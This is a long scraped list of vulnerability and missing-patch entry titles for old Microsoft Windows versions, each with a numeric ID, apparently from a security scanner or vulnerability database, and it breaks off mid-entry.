Knowledge Base Article 922760 update is not installed [29201] Microsoft Windows Knowledge Base Article 923191 update is not installed [29171] Microsoft Windows Knowledge Base Article 925486 update is not installed [28664] Microsoft Windows Knowledge Base Article 922770 update is not installed [28660] Microsoft Windows Knowledge Base Article 921503 update is not installed [28659] Microsoft Windows OLE Automation code execution [28656] Microsoft Windows Knowledge Base Article 924090 update not installed [28652] Microsoft Windows Knowledge Base Article 920685 update is not installed [28649] Microsoft Windows Knowledge Base Article 910729 update is not installed [28646] Microsoft Windows Knowledge Base Article 919007 update is not installed [28643] Microsoft Windows XP PGM buffer overflow [28600] Microsoft Windows winhlp32 HLP file unspecified code execution [28512] Microsoft Internet Explorer multiple Windows 2000 COM object denial of service [28474] Microsoft Windows PNG IHDR block denial of service [28281] Microsoft Windows WMF gdi32.dll denial of service [28240] Microsoft Windows DNS client data string buffer overflow [28183] Microsoft Windows gdiplus.dll denial of service [28045] Microsoft Windows Knowledge Base Article 918899 update is not installed [28028] Microsoft Windows Knowledge Base Article 922616 update is not installed [28027] Microsoft Windows Knowledge Base Article 922968 update is not installed [28024] Microsoft Windows Knowledge Base Article 921645 update is not installed [28022] Microsoft Windows Knowledge Base Article 920670 update is not installed [28020] Microsoft Windows Hyperlink Object Library (hlink.dll) buffer overflow [28019] Microsoft Windows Knowledge Base Article 920214 update is not installed [28018] Microsoft Windows Knowledge Base Article 921398 update is not installed [28017] Microsoft Windows Knowledge Base Article 920958 update is not installed [28016] Microsoft Windows kernel system inputs buffer overflow [28015] Microsoft Windows Knowledge Base Article 920683 update is not installed [28014] Microsoft Windows Winsock API buffer overflow [28013] Microsoft Windows DNS client buffer overflow [28012] Microsoft Windows Knowledge Base Article 917422 update is not installed [28011] Microsoft Windows kernel exception handling code execution [28009] Microsoft Windows kernel Winlogon privilege escalation [28008] Microsoft Windows Knowledge Base Article 917008 update is not installed [28005] Microsoft Windows 2000 Management Console (MMC) resource file cross-site scripting [28004] Microsoft Windows Knowledge Base Article 921883 update is not installed [28002] Microsoft Windows Server service buffer overflow [27999] Microsoft Windows SMB malformed PIPE denial of service [27832] Microsoft Windows ASN.1 Library HTTP NTLM buffer overflow [27567] Microsoft Windows explorer.exe Internet Shortcut (.url) denial of service [27562] Microsoft Windows Knowledge Base Article 915384 update is not installed [27554] Microsoft Windows Knowledge Base Article 917284 update is not installed [27467] Microsoft Windows Knowledge Base Article 917285 update is not installed [27417] Microsoft Windows Live Messenger contact list denial of service [26905] Microsoft Windows Knowledge Base Article 918547 update is not installed [26903] Microsoft Windows Knowledge Base Article 917336 update is not installed [26886] Microsoft Windows Knowledge Base Article 917953 update is not installed [26884] Microsoft Windows Knowledge Base Article 917736 update is not installed [26883] Microsoft Windows Knowledge Base Article 917537 update is not installed [26882] Microsoft Windows Knowledge Base Article 917344 update is not installed [26880] Microsoft Windows Knowledge Base Article 917159 update is not installed [26876] Microsoft Windows Knowledge Base Article 916281 update is not installed [26874] Microsoft Windows Knowledge Base Article 914389 update is not installed [26871] Microsoft Windows Knowledge Base Article 914388 update is not installed [26868] Microsoft Windows Knowledge Base Article 917734 update is not installed [26867] Microsoft Windows Knowledge Base Article 911280 update is not installed [26865] Microsoft Windows Knowledge Base Article 917283 update is not installed [26861] Microsoft Windows Knowledge Base Article 918439 update is not installed [26836] Microsoft Windows RPC mutual authentication spoofing [26834] Microsoft Windows TCP/IP protocol driver buffer overflow [26830] Microsoft Windows SMB invalid handle denial of service [26823] Microsoft Windows DHCP Client buffer overflow [26820] Microsoft Windows SMB Server service information disclosure [26818] Microsoft Windows Mailslot Server driver buffer overflow [26815] Microsoft Windows Graphics Rendering Engine (GRE) WMF code execution [26814] Microsoft Windows RRAS RASMAN buffer overflow [26813] Microsoft Windows Knowledge Base Article 916768 update is not installed [26812] Microsoft Windows RRAS buffer overflow [26809] Microsoft Windows ART image rendering library buffer overflow [26805] Microsoft Windows JScript code execution [26788] Microsoft Windows Media Player PNG buffer overflow [26487] Microsoft Windows NTDLL.DLL improper DOS to NT path conversion [26166] Microsoft Windows Knowledge Base Article 912442 update is not installed [26161] Microsoft Windows Knowledge Base Article 916803 update is not installed [26156] Microsoft Windows Knowledge Base Article 913580 update is not installed [25794] Microsoft Windows Knowledge Base Article 917627 update is not installed [25792] Microsoft Windows Knowledge Base Article 911567 update is not installed [25629] Microsoft Windows Knowledge Base Article 912812 update is not installed [25626] Microsoft Windows Knowledge Base Article 911562 update is not installed [25625] Microsoft Windows Knowledge Base Article 908531 not installed [25598] Microsoft Windows XP Firewall .exe firewall bypass [25597] Microsoft Windows XP Firewall ADS filename:stream syntax application alert bypass [25573] Microsoft Windows winhlp32.exe .hlp embedded image buffer overflow [25554] Microsoft Windows Explorer COM object code execution [25535] Microsoft Outlook Express Windows Address Book file buffer overflow [25370] Microsoft Windows Knowledge Base Article 901190 not installed [25369] Microsoft Windows DNS recursive query denial of service [25366] Microsoft Windows Knowledge Base Article 905755 update is not installed [25365] Microsoft Windows Knowledge Base Article 914798 update is not installed [25364] Microsoft Windows Knowledge Base Article 914451 update is not installed [25363] Microsoft Windows Knowledge Base Article 905756 update is not installed [25361] Microsoft Windows Knowledge Base Article 905758 update is not installed [25360] Microsoft Windows Knowledge Base Article 905754 update is not installed [25359] Microsoft Windows Knowledge Base Article 905555 update is not installed [25358] Microsoft Windows Knowledge Base Article 905646 update is not installed [25357] Microsoft Windows Knowledge Base Article 905757 update is not installed [25342] Microsoft Windows Knowledge Base Article 905553 update is not installed [25261] Microsoft Windows Knowledge Base Article 913433 is not installed [24586] Microsoft Windows DNS client ATMA data record buffer overflow [24512] Microsoft Windows Knowledge Base Article 911565 update is not installed [24511] Microsoft Windows Knowledge Base Article 911564 update is not installed [24509] Microsoft Windows Knowledge Base Article 889167 update is not installed [24496] Microsoft Windows Knowledge Base Article 911927 update is not installed [24495] Microsoft Windows Knowledge Base Article 913446 update is not installed [24494] Microsoft Windows Knowledge Base Article 910620 update is not installed [24493] Microsoft Windows Media Player Plugin EMBED element buffer overflow [24492] Microsoft Windows and Office Korean IME privilege elevation [24491] Microsoft Windows MSRPC WebClient service message buffer overflow [24489] Microsoft Windows IGMP v3 denial of service [24488] Microsoft Windows Media Player BMP image parsing service buffer overflow [24474] Microsoft Windows 2000 LDAP client accepts untrusted CA [24473] Microsoft Windows 2000 event ID 565 not logged [24472] Microsoft Windows 2000 Event ID 1704 records incorrect group policy settings [24471] Microsoft Windows VDM information disclosure [24463] Microsoft Windows XP &quot [24407] Microsoft Windows 2000 SECEDIT command fails to set ACLs correctly [24405] Microsoft Windows 2000 UPN credentials with trailing dot group policy bypass [24403] Microsoft Windows 2000 WideCharToMultiByte() incorrect Japanese character conversion [24402] Microsoft Windows 2000 Terminal Service client IP not logged [24400] Microsoft Windows 2000 domain authentication can be bypassed by a local administrator [24157] Microsoft Windows wireless ad-hoc network unauthorized access [24044] Microsoft Windows GRE ExtCreateRegion() and ExtEscape() WMF denial of service [23978] Microsoft Windows Knowledge Base Article 912919 update is not installed [23926] Microsoft Windows Knowledge Base Article 908523 update is not installed [23924] Microsoft Windows Knowledge Base Article 908519 update is not installed [23922] Microsoft Windows embedded Open Type Web font buffer overflow [23846] Microsoft Windows GDI32.DLL WMF image rendering code execution [23453] Microsoft Windows COM object as ActiveX control allows execution of code [23450] Microsoft Windows Knowledge Base Article 905915 update is not installed [23447] Microsoft Windows APC queue list could allow elevated privileges [23284] Microsoft Windows SynAttackProtect denial of service [23066] Microsoft Windows XP and 2000 Server MSRPC memory allocation denial of service [22899] Microsoft Windows Knowledge Base Article 902412 update is not installed [22882] Microsoft Windows Knowledge Base Article 896424 update is not installed [22877] Microsoft Windows Metafile image format buffer overflow [22876] Microsoft Windows Metafile and Enhance Metafile buffer overflow [22524] Microsoft Windows XP Wireless Zero Configuration service information disclosure [22514] Microsoft Windows Knowledge Base Article 902400 update is not installed [22512] Microsoft Windows Knowledge Base Article 907245 update is not installed [22502] Microsoft Windows Knowledge Base Article 905749 update is not installed [22501] Microsoft Windows Knowledge Base Article 900725 update is not installed [22498] Microsoft Windows XP tftp.exe heap overflow [22495] Microsoft Windows Collaboration Data Objects buffer overflow [22492] Microsoft Windows Knowledge Base Article 904706 update is not installed [22481] Microsoft Windows MSRPC Plug and Play buffer overflow [22480] Microsoft Windows DirectShow .AVI file code execution [22479] Microsoft Windows HTML in preview fields execute code [22478] Microsoft Windows .lnk properties execute code [22477] Microsoft Windows .lnk file execute code [22476] Microsoft Windows Distributed Transaction Coordinator message denial of service [22475] Microsoft Windows Distributed Transaction Coordinator TIP denial of service [22473] Microsoft Windows COM code execution [22204] Microsoft Windows keybd_event or SendKeys allows elevated privileges [22156] Microsoft Windows Knowledge Base Article 899589 update is not installed [22089] Microsoft Windows Registry Editor Utility concealment [21980] Microsoft Windows Registry Editor Utility concealment [21978] Microsoft Windows user32.dll component denial of service [21954] Microsoft Windows Remote Desktop Protocol mstlsapi.dll Man-in-the-Middle [21931] Microsoft Windows XP memory leak [21895] Microsoft Windows Msdds.dll object command execution [21704] Microsoft Windows Knowledge Base Article 896727 update is not installed [21700] Microsoft Windows Client Service for NetWare code execution [21626] Microsoft Windows PKINIT protocol obtain information [21625] Microsoft Windows kerberos message denial of service [21605] Microsoft Windows Knowledge Base Article 896423 update is not installed [21604] Microsoft Windows print spooler buffer overflow [21603] Microsoft Windows Knowledge Base Article 899588 update is not installed [21602] Microsoft Windows Plug and Play buffer overflow [21601] Microsoft Windows Knowledge Base Article 899591 update is not installed [21600] Microsoft Windows Knowledge Base Article 893756 update is not installed [21599] Microsoft Windows telephony service buffer overflow [21539] Microsoft Windows USB device driver buffer overflow [21407] Microsoft Windows RDP request denial of service [21355] Microsoft Windows Network Connection Manager denial of service [21345] Microsoft Windows 2000 Update Rollup 1 for Service Pack 4 has not been installed [21272] Microsoft Windows Knowledge Base Article 903672 update is not installed [21269] Microsoft Windows Knowledge Base Article 901214 update is not installed [21221] Microsoft Windows Color Management Module buffer overflow [21214] Microsoft Windows NTFS allows attacker to obtain information [20829] Microsoft Windows Step-by-Step Interactive Training bookmark link file buffer overflow [20826] Microsoft Windows Knowledge Base Article 896422 update is not installed [20825] Microsoft Windows Knowledge Base Article 896358 update is not installed [20823] Microsoft Windows Knowledge Base Article 890169 update is not installed [20822] Microsoft Windows Knowledge Base Article 883939 update is not installed [20821] Microsoft Windows compiled Help (.CHM) integer overflow [20820] Microsoft Windows Knowledge Base Article 896426 update is not installed [20818] Microsoft Windows WebClient Service buffer overflow [20815] Microsoft Windows SMB process gain access [20629] Multiple Microsoft Windows IPv6 LAND denial of service [20546] Microsoft Windows Media Player allows creation of malicious media files [20382] Microsoft Windows Knowledge Base Article 894320 update is not installed [20380] Microsoft Windows Web View command execution [20318] Microsoft Windows Knowledge Base Article 893086 update is not installed [20317] Microsoft Windows Knowledge Base Article 890923 update is not installed [20000] Microsoft Windows Knowledge Base Article 892944 update is not installed [19969] Multiple Microsoft Windows Server 2003 Edition printer driver denial of service [19965] Multiple Microsoft Windows Server 2003 Editions SMB redirector denial of service [19843] Microsoft Windows Knowledge Base Article 894549 update is not installed [19836] Microsoft Windows CSRSS gain control [19835] Microsoft Windows HTML Application Host command execution [19834] Microsoft Windows object buffer overflow [19832] Microsoft Windows access requests gain privileges [19830] Microsoft Windows font buffer overflow [19829] Microsoft Windows Message Queuing component buffer overflow [19819] Microsoft Windows Remote Desktop &quot [19727] Microsoft Windows 2000 GDI32.DLL denial of service [19593] Microsoft Windows LAND denial of service [19288] IBM DB2 running on Microsoft Windows obtain information [19270] Microsoft Windows PNG image buffer overflow [19220] Microsoft Windows registry key connection denial of service [19110] Microsoft Windows Hyperlink Object Library code execution [19109] Microsoft Windows OLE code execution [19105] Microsoft Windows COM files gain privileges [19103] Multiple Microsoft Windows TCP/IP denial of service [19101] Microsoft Windows Servers License Logging service code execution [19096] Microsoft Windows Media Player PNG buffer overflow [19093] Microsoft Windows named pipe information disclosure [19091] Microsoft Windows SharePoint Services and SharePoint Team Services cross-site scripting [19089] Microsoft Windows SMB code execution [18879] Microsoft Windows USER32.DLL ANI header overflow [18768] Microsoft Windows Knowledge Base Article 891711 update is not installed [18766] Microsoft Windows Knowledge Base Article 871250 update is not installed [18758] Microsoft Windows Indexing Service allows code execution [18678] Microsoft Windows winhlp32.exe buffer overflow [18668] Microsoft Windows LoadImage API buffer overflow [18667] Microsoft Windows ANI file zero rate number overflow denial of service [18587] Microsoft Windows Media Player ActiveX object reveals existence of files [18576] Microsoft Windows Media Player mp3 code execution [18507] Microsoft Windows XP SP2 subnet option allows access to firewall exceptions [18394] Microsoft Windows Knowledge Base Article 870763 update is not installed [18393] Microsoft Windows Knowledge Base Article 873339 update is not installed [18392] Microsoft Windows Knowledge Base Article 885249 update is not installed [18391] Microsoft Windows Knowledge Base Article 885835 update is not installed [18390] Microsoft Windows Knowledge Base Article 885836 update is not installed [18378] Microsoft Windows Icon image anomaly detected [18342] Microsoft Windows NT DHCP HardwareAddress code execution [18341] Microsoft Windows NT DHCP MachineName denial of service [18340] Microsoft Windows LSASS gain privileges [18339] Microsoft Windows kernel LPC interface gain privileges [18338] Microsoft Windows Word for Windows 6.0 Converter font code execution [18337] Microsoft Windows Word for Windows 6.0 Converter table code execution [18336] Microsoft Windows HyperTerminal session file buffer overflow [18314] Microsoft Windows Knowledge Base Article 889293 update is not installed [18208] Microsoft Windows logon screen saver allows elevated privileges [17864] Microsoft Windows XP Explorer WAV file denial of service [17711] Microsoft Windows XP SP2 sessmgr.exe firewall bypass [17663] Microsoft Windows MS04-029 patch is not installed [17662] Microsoft Windows MS04-037 patch is not installed [17661] Microsoft Windows MS04-036 patch is not installed [17660] Microsoft Windows MS04-035 patch is not installed [17659] Microsoft Windows MS04-034 patch is not installed [17658] Microsoft Windows MS04-032 patch is not installed [17657] Microsoft Windows NetDDE MS04-031 patch is not installed [17646] Microsoft Windows RPC Runtime Library obtain information [17641] Microsoft Windows NNTP buffer overflow [17624] Microsoft Windows XP and Windows Server 2003 Compressed Folders buffer overflow [17621] Microsoft Windows 2003 SMTP service code execution [17560] Microsoft Windows 2000 and XP GDI library denial of service [17521] Microsoft Windows 2000 Service Pack 4 is not installed [17458] Microsoft Windows CE KDataStruct information disclosure [17457] Microsoft Windows XP Explorer.exe TIFF denial of service [17455] Microsoft Windows XP information disclosure [17412] IBM with Microsoft Windows XP Professional has default administrator account [17341] Microsoft Windows MS04-028 patch is not installed [17052] Microsoft Windows XP and Internet Explorer displays improper file icon [17051] Microsoft Windows XP Content-Location bypass Local Computer zone restrictions [17023] Microsoft Windows XP Windows Explorer bypass Zone Identifier (ZoneID) feature [17009] Microsoft Windows XP ICF bypass filter [17004] Microsoft Windows XP Service Pack 2 is not installed on the system [16913] Microsoft Windows 2003 users with Synchronize directory service data privilege [16912] Microsoft Windows 2003 groups with Synchronize directory service data privilege [16909] Microsoft Windows 2003 groups with Remove computer from docking station privilege [16907] Microsoft Windows 2003 users with Create global objects privilege [16905] Microsoft Windows 2003 users or groups with Create global objects privilege [16851] Microsoft Windows 2003 and XP WinKey and U key denial of service [16704] Microsoft Windows 2000 Media Player control code execution [16664] Microsoft Windows Program Group Converter buffer overflow [16627] Microsoft Windows System32 write file to the directory has been detected [16597] Microsoft Windows Windows Shell allows code execution [16592] Microsoft Windows Utility Manager gain privileges [16591] Microsoft Windows Task Scheduler buffer overflow [16590] Microsoft Windows POSIX buffer overflow allows local attacker to gain privileges [16587] Microsoft Windows Network Dynamic Data Exchange Running [16586] Microsoft Windows HTML Help could allow execution of code [16582] Microsoft Windows Server 2003 kernel CPU denial of service [16581] Microsoft Windows Enhanced Metafile (EMF) buffer overflow [16580] Microsoft Windows Virtual DOS Machine (VDM) allows elevated privileges [16579] Microsoft Windows Window Management API allows elevated privileges [16572] Microsoft Windows 2003 Users with Impersonate a client after authentication privilege [16570] Microsoft Windows 2003 Users with Create global objects privilege [16564] Microsoft Windows 2003 Groups with Create global objects privilege [16562] Microsoft Windows 2003 Groups with &quot [16556] Microsoft Windows NetDDE buffer overflow [16522] Microsoft Windows 2003 Impersonate a client after authentication privilege [16521] Microsoft Windows 2003 Deny Logon Through Terminal Services privilege [16520] Microsoft Windows 2003 Create global objects privilege [16362] Microsoft Windows XP Help Center and Support starts automatically [16304] Microsoft Windows JPEG buffer overflow [16276] Microsoft Windows 2000 Advanced Server fully qualified domain name security bypass [16270] Microsoft Windows IPSec filter bypass [16213] Microsoft Windows Local Security Authority buffer overflow exploit attempt detected [16211] Microsoft Windows Service Host buffer overflow exploit attempt detected [16210] Microsoft Windows Service Host buffer overflow exploit attempt detected [16208] Microsoft Windows RPC Locator Service buffer overflow exploit attempt detected [16207] Microsoft Windows kernel buffer overflow exploit attempt detected [16206] Microsoft Windows Command Shell buffer overflow exploit attempt detected [16171] Microsoft Windows XP Explorer code execution [16154] Microsoft Windows NT 4.0 TSE Security Patch denial of service [16095] Microsoft Windows XP and Windows Server 2003 HCP URL code execution [15956] Microsoft Windows long file share name buffer overflow [15818] Microsoft Windows MS04-011 patch is not installed [15813] Microsoft Windows MS04-014 patch is not installed [15811] Microsoft Windows MS04-012 patch is not installed [15715] Microsoft Windows Negotiate Security Software Provider buffer overflow [15714] Microsoft Windows Virtual DOS Machine allows elevated privileges [15713] Microsoft Windows ASN.1 double-free [15711] Microsoft Windows object identifier could be used to open network ports [15710] Microsoft Windows H.323 buffer overflow [15709] Microsoft Windows COM Internet Service and RPC over HTTP denial of service [15708] Microsoft Windows RPCSS Service RPC message can cause denial of service [15707] Microsoft Windows Local Descriptor Table allows privilege escalation [15704] Microsoft Windows XP and Windows Server 2003 HCP URL code execution [15702] Microsoft Windows winlogon buffer overflow [15700] Microsoft Windows 2000 Domain Controller LSASS LDAP message denial of service [15699] Microsoft Windows LSASS buffer overflow [15678] Microsoft Windows XP task creation allows privilege escalation [15632] Microsoft Windows 2000 Utility Manger allows privilege escalation [15589] Microsoft Windows allows elevated privileges [15507] Microsoft Windows XP Explorer wmf denial of service [15461] Microsoft Windows MS04-008 patch is not installed [15394] Microsoft Windows service running under non-built-in accounts has been detected [15284] Microsoft Windows XP Windows shell shimgvw.dll buffer overflow [15263] Microsoft Windows XP and 2000 Server kernel allows elevated privileges [15256] Microsoft Windows ASN.1 buffer overflow packet using NTLM has been detected [15255] Microsoft Windows ASN.1 buffer overflow packet using SMTP has been detected [15223] Microsoft Windows access violation or exception code has been detected [15218] Microsoft Windows command shell backdoor [15101] Microsoft Windows XP helpctr.exe cross-site scripting [15057] Microsoft Windows XP and Windows Server 2003 smbmount Linux client denial of service [15039] Microsoft Windows ASN.1 Library buffer overflow [15038] Microsoft Windows 2000 Server Windows Media Services denial of service [15037] Microsoft Windows Server 2003 WINS /GS flag denial of service [14924] Microsoft Windows XP folder containing HTML code and executable file code execution [13786] Microsoft Windows MS03-051 patch is not installed [13785] Microsoft Windows MS03-048 patch is not installed [13784] Microsoft Windows MS03-050 patch is not installed [13639] Microsoft Windows Workstation buffer overflow [13638] Microsoft Windows MS03-049 patch is not installed [13558] Microsoft Windows XP CommCtl32.dll could allow an attacker to execute code [13509] Microsoft Windows HTML Help could allow an attacker to gain privileges [13482] Microsoft Windows MS03-047 patch is not installed [13480] Microsoft Windows MS03-046 patch is not installed [13478] Microsoft Windows MS03-044 patch is not installed [13473] Microsoft Windows MS03-045 patch is not installed [13472] Microsoft Windows MS03-042 patch is not installed [13471] Microsoft Windows MS03-041 patch is not installed [13444] Microsoft Windows Non-English patched with MS03-045 denial of service in Sophos Anti-Virus [13426] Microsoft Windows 2000 and XP RPC race condition [13424] Microsoft Windows User32.dll ListBox and ComboBox controls buffer overflow [13423] Microsoft Windows 2000 Local Troubleshooter ActiveX control buffer overflow [13422] Microsoft Windows Authenticode could allow an attacker to execute code [13420] Microsoft Windows HSC HCP protocol file buffer overflow [13413] Microsoft Windows Messenger Service popup buffer overflow [13412] Microsoft Windows MS03-043 patch is not installed [13407] Microsoft Windows 2000 Server mqsvc.exe MQLocateBegin packet buffer overflow [13385] Microsoft Windows Server 2003 &quot [13375] Microsoft Windows Media Player Dynamic HTML behaviors allows an attacker to execute code [13364] Microsoft Windows MS03-040 patch is not installed [13344] Microsoft Windows 98 flood of fragmented UDP packets causes denial of service [13342] Microsoft Windows PostThreadMessage API allows processes to be terminated without permission [13211] Microsoft Windows 2000 and XP URG memory leak [13183] Microsoft Windows service pack detected [13171] Microsoft Windows Server 2003 can allow attacker to bypass mechanism used to detect buffer overflows [13134] Microsoft Windows MS03-039 patch is not installed [13131] Microsoft Windows 2000 Message Queue Manager buffer overflow [13129] Microsoft Windows RPCSS DCOM buffer overflows [13105] Microsoft Windows Update fails to notify users of updates when host-blocking is used [13095] Microsoft Windows auto update is disabled [13089] Microsoft Windows NetBIOS Name Service information disclosure [12903] Microsoft Windows command shell banner [12835] Microsoft Windows Pocket PC could allow an attacker to gain access [12762] Microsoft Windows NT 4.0 Q823803i patch RRAS denial of service [12747] Microsoft Windows RPC DCOM interface buffer overflow detected [12724] Microsoft Windows Media Player ASF file could allow code execution [12701] Microsoft Windows NT 4.0 Server file management function denial of service [12679] Microsoft Windows RPC DCOM denial of service [12652] Microsoft Windows 2000 and NT 4.0 Server IIS ISAPI nsiislog.dll extension POST request buffer overflow [12620] Microsoft Windows 2000 Server SMTP FILETIME denial of service [12544] Microsoft Windows Servers SMB packet buffer overflow [12543] Microsoft Windows 2000 Accessibility Utility Manager could allow an attacker to gain privileges [12533] Microsoft Windows MS03-010 patch is not installed [12521] Microsoft Windows Rundll32.exe overly long routine name buffer overflow [12493] Microsoft Windows Shell32.dll 2000 ShellExecute function buffer overflow [12489] Microsoft Windows 2000 Server Active Directory buffer overflow [12442] Microsoft Windows XP SP1 Windows shell desktop.ini buffer overflow [12440] Microsoft Windows Media Player ActiveX control could disclose sensitive information [12187] Microsoft Windows XP gethostbyaddr() denial of service [12128] Microsoft Windows 2000 and Windows NT MS03-019 patch is not installed [12092] Microsoft Windows 2000 and NT 4.0 Server IIS ISAPI nsiislog.dll extension buffer overflow [12048] Microsoft Windows 2000 and Windows Server 2003 LAN Manager hash creation enabled [11953] Microsoft Windows Media Player skin downloading could allow an attacker to execute code [11824] Microsoft Windows XP Service Control Manager (SCM) race condition [11822] Microsoft Windows regedit.exe command execution [11816] Microsoft Windows 2000 Terminal Services MSGINA.DLL insecure access permissions [11810] Microsoft Windows win2k.sys EngTextOut denial of service [11803] Microsoft Windows kernel LpcRequestWaitReplyPort() buffer overflow [11696] Microsoft Windows 2000 Terminal Services man-in-the-middle attack [11617] Microsoft Windows 2000 MS03-007 patch is not installed on the system [11575] Microsoft Windows Script Engine buffer overflow [11546] Microsoft Windows 2000 Windows Help Facility .cnt file buffer overflow [11536] Microsoft Windows PostMessage() API function could disclose password [11505] Microsoft Windows XP Safe Mode bypass [11425] Microsoft Windows Me HSC hcp:// buffer overflow [11344] Microsoft Windows riched20.dll attribute label buffer overflow [11329] Microsoft Windows NT and 2000 cmd.exe CD path name buffer overflow [11274] Microsoft Windows 2000 NetBIOS continuation packets denial of service [11273] Microsoft Windows 2000 RPC service could allow an attacker to gain elevated privileges [11260] Microsoft Windows XP Windows Redirector buffer overflow [11216] Microsoft Windows NT and 2000 command prompt denial of service [11141] Microsoft Windows 2000 Terminal Services MSGINA.DLL denial of service [11132] Microsoft Windows Locator service buffer overflow [11030] Microsoft Windows OpenType font (.otf) fontview denial of service [10958] Microsoft Windows File Protection certificate chains with a trusted root CA are accepted [10957] Microsoft Windows File Protection fails to remove old security catalog .CAT files [10892] Microsoft Windows XP Shell media file buffer overflow [10843] Microsoft Windows 2000 and XP SMB signing group policy modification [10764] Microsoft Windows XP wireless LAN feature could leak information [10736] Microsoft Windows XP Fast User Switching could disclose user processes [10431] Microsoft Windows 2000 SNMP LANMAN Extension memory leak denial of service [10400] Microsoft Windows 2000 RPC TCP port 135 denial of service [10398] Microsoft Windows Media Player world-writable executables [10377] Microsoft Windows XP and 2000 administrative alerts fail when security event log is full [10343] Microsoft Windows NetDDE Agent can be used to gain elevated privileges [10279] Microsoft Windows XP &quot [10254] Microsoft Windows compiled HTML Help (.chm) files could be used to execute code [10253] Microsoft Windows HTML Help ActiveX buffer overflow [10252] Microsoft Windows zipped file decompression incorrect target path [10251] Microsoft Windows zipped file decompression buffer overflow [10215] Microsoft Windows Scripting Host is running on the system [10199] Microsoft Windows 2000/XP PPTP packet buffer overflow [10132] Microsoft Windows fails to properly check execute permissions for 16-bit executable files [10122] Microsoft Windows Remote Desktop Protocol could allow an attacker to monitor keystrokes [10121] Microsoft Windows Remote Desktop Protocol checksum information leak [10120] Microsoft Windows XP Remote Desktop malformed PDU Confirm Active packet denial of service [9982] Microsoft Windows Certificate Enrollment Control ActiveX control could be used to delete digital certificates [9971] Microsoft Windows Media Player .wmf file extension or content type spoofing [9953] Microsoft Windows Media Player WMD code execution [9946] Microsoft Windows 2000 Terminal Services session screensaver fails to lock the console [9933] Microsoft Windows NT/2000/XP SMB packet request buffer overflow [9878] Microsoft Windows XP Help and Support Center HCP:// URL could be used to delete files [9869] Microsoft Windows NTFS hard links could bypass event auditing logs [9856] Microsoft Windows 2000 NCM handler routine could allow elevated privileges [9779] Microsoft Windows 2000 weak system partition permissions [9752] Microsoft Windows 2000 Service Pack 3 is not installed [9746] Microsoft Windows 2000 HTML Help item parameter buffer overflow [9727] Microsoft Windows Media Player mplay32 long file name buffer overflow [9625] Microsoft Windows 2000 Narrator allows login information to be audible [9422] Microsoft Windows Media Player Active Playlist could allow local HTML script execution [9421] Microsoft Windows Media Player WMDM service invalid resource connection could allow elevated privileges [9420] Microsoft Windows Media Player cache path disclosure could allow remote execution of code [8918] Microsoft Windows XP Remote Desktop Access is enabled [8915] Microsoft Windows XP Internet Configuration Firewall is disabled [8892] Microsoft Windows XP &quot [8891] Microsoft Windows XP option to digitally sign server communications disabled [8890] Microsoft Windows XP option to digitally sign client communications when server agrees disabled [8889] Microsoft Windows XP option to digitally sign server communications when client agrees disabled [8888] Microsoft Windows XP security option to digitally sign client communications disabled [8882] Microsoft Windows XP Session security for NTLM SSP based servers is below minimum [8880] Microsoft Windows XP Session security for NTLM SSP based clients is below minimum [8867] Microsoft Windows 2000 LanMan denial of service [8813] Microsoft Windows 2000 Terminal Services allows attacker to bypass group policy settings [8759] Microsoft Windows 2000 could allow an attacker to block the application of Group Policy settings [8752] Microsoft Windows NT, 2000, and XP MUP buffer overflow [8739] Microsoft Windows 2000 DCOM memory leak [8728] Microsoft Windows Registry remote write audit [8727] Microsoft Windows Registry remote access audit [8621] Microsoft Internet Explorer on Windows Me fails to prompt user when a cookie is stored if set using JavaScript [8604] Microsoft Outlook allows an attacker to execute JavaScript code by using IFRAME tags to reference malicious Windows Media Player file [8559] Microsoft Windows registry security SAM read [8512] Microsoft Windows NT security ID lookup [8509] Microsoft Windows startup folder access [8462] Microsoft Windows NT/2000 debugging subsystem allows attacker to create duplicate handles [8402] Microsoft Windows 2000 allows an attacker to bypass password policy [8388] Microsoft Windows NT Server with IIS 4.0 could allow users to bypass &quot [8384] Microsoft Windows Shell buffer overflow can occur when an application has been improperly removed [8307] Microsoft Windows 2000, Windows XP, and Exchange 2000 SMTP data transfer command denial of service [8304] Microsoft Windows 2000 and Exchange 5.5 SMTP service unauthorized mail privileges [8231] Microsoft Windows NT SNMP OID decoding memory leak [8209] Microsoft Windows XP CIFS port denial of service [8207] Microsoft Windows XP UDP port denial of service [8199] Microsoft Windows 2000 Terminal Services unlocked client [8094] Microsoft Windows 2000 and Interix 2.2 Telnet protocol option buffer overflow [8077] Microsoft Windows Messenger and/or MSN Messenger is present on the system [8043] Microsoft Windows NT, 2000, and XP using NTFS could allow files to be hidden [8037] Microsoft Windows 2000 empty TCP packet denial of service [8023] Microsoft Windows NT and Windows 2000 SIDs could allow an attacker to gain elevated privileges in another domain [8000] Microsoft Windows XP &quot [7922] Microsoft Windows XP Pro Upgrade installation causes security patches for Internet Explorer to be rolled back [7892] Microsoft Windows 95 Backup long file extension buffer overflow [7800] Microsoft Internet Explorer Windows Media Player ActiveX could allow an attacker to determine the existence of files or directories [7732] Microsoft Windows XP Remote Desktop sends username in plain text [7731] Microsoft Windows XP fast user switching could lockout users except administrator [7722] Microsoft Windows XP, Me, 98, and 98SE UPnP spoofed UDP packet with SSDP announcement denial of service attack [7721] Microsoft Windows XP, Me, 98, and 98SE UPnP malformed NOTIFY directive buffer overflow [7713] Microsoft Windows XP allows attacker to execute programs using hotkeys without authentication [7709] Microsoft Windows multiple vendor Web browser high image count denial of service [7667] Microsoft Windows 2000 IKE UDP packet flood denial of service [7605] Microsoft Windows XP helpctr.exe buffer overflow [7542] Microsoft Windows 95 and 98 with multiple TCP/IP stacks ICMP packet denial of service [7538] Microsoft Windows 2000 and XP Terminal services allow an attacker to spoof IP addresses [7533] Microsoft Windows 2000 RunAs service denial of service [7532] Microsoft Windows 2000 RunAs service allows local attacker to bypass pipe authentication [7531] Microsoft Windows 2000 RunAs service reveals sensitive information [7528] Microsoft Windows NT and Windows 2000 malformed RPC request denial of service [7428] Microsoft Windows Me and XP UPnP denial of service [7422] Microsoft Windows NT RSHSVC does not properly validate users [7421] Microsoft Windows NT GetThreadContext/SetThreadContext denial of service [7409] Microsoft Windows 2000 and Windows XP GDI denial of service [7405] Microsoft Windows NT NonPagedPool denial of service [7403] Microsoft Windows NT Win32k.sys denial of service [7402] Microsoft Windows NT kernel mode handle-closing denial of service [7401] Microsoft Windows NT group policies not applied if long DC name [7400] Microsoft Windows NT user policies not updated [7398] Microsoft Windows NT symbolic link case elevation of privileges [7391] Microsoft Windows NT strong passwords may allow parts of the full name [7369] Microsoft Windows CSRSS.EXE denial of service [7329] Microsoft Windows NT 